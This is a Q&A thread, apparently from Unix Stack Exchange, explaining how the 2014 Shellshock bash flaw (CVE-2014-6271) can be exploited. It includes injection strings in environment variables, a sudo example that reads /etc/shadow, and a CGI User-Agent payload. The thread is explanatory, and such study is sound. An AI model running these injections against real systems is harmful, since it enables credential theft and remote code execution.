CVE-2014-6271 Bash Vulnerability example

Question

I am trying to understand what could be the security concern of CVE-2014-6271 and all the links I see just gives me the below command.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If I get the output as,

vulnerable
this is a test

It means, my bash shell is vulnerable.

But in what way it is related to security? In other words, what harm could be done to my system?

Related: http://unix.stackexchange.com/questions/157381/are-any-other-versions-of-bash-vulnerable-to-shellshock-cve-2014-6271-beside — jippie, Sep 25 '14 at 05:13

phemmer · Answer 1 · 2014-09-25T05:37:36.457

The security concern is that if a bash is launched with a malicious environment variable set, that bash will execute the code in the variable.

For example, lets say you have a web server that calls /bin/foo bar. Lets say this foo application also uses an environment variable called baz, and the value of this variable comes from input provided by the user. So the web server application sets the environment, and then shells out to foo bar. Well, when bash reads the environment variables, if that provided variable has malicious code, bash is going to run it.

Normally this is not a concern. Environment variables are supposed to be completely safe. If the application using that variable misbehaves, that is another matter. But bash does not use the baz variable in the situation above.

For example:

testscript.sh

export BAZ='() { :;}; echo MALICIOUS CODE'
echo starting sleep
/bin/bash -c 'sleep 1'

When running it, we get the following

$ /bin/dash testscript.sh
starting sleep
MALICIOUS CODE

So simply from having that variable set, we can get bash to run arbitrary code.

Here's another example that uses no explicit shell, and makes no mention of bash:

$ perl -e '$ENV{"BAZ"}="() { :;}; echo MALICIOUS CODE"; print("starting sleep\n"); system("/bin/sleep 1;");'
starting sleep
MALICIOUS CODE

(for this to work, /bin/sh needs to be bash)

Thanks for the wonderful explanation. I appreciate it :) – Ramesh Sep 25 '14 at 05:22 — Ramesh, Sep 25 '14 at 05:22

alinh · Answer 2 · 2014-09-25T07:19:41.060

0

It works via sudo as well if env_reset is disabled (it's enabled by default in Debian at least)

Defaults env_reset

but if one changes it to

Defaults !env_reset (seen this on several systems in the past!!!)

then

sudo Y='() { disabled; }; /bin/cat /etc/shadow;' /tmp/zomg.sh

root:$6$......`
seg fault goes here

sudoers file contains :

alinh ALL=/tmp/zomg.sh

edited Sep 25 '14 at 07:19

answered Sep 25 '14 at 06:29

alinh

122

score 0 · Answer 3 · answered Sep 25 '14 at 07:12

These guys explain how you can inject code into the webserver CGI process. It basically works by setting the useragent of a request in such a way that it contains the exploit code:

http://packetstormsecurity.com/files/128394/bash-poc.txt

'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'

When that attack succeeds you can gain access to the webserver with webserver privileges and its entire content is to be regarded as compromised.

CVE-2014-6271 Bash Vulnerability example

3 Answers3

testscript.sh

Linked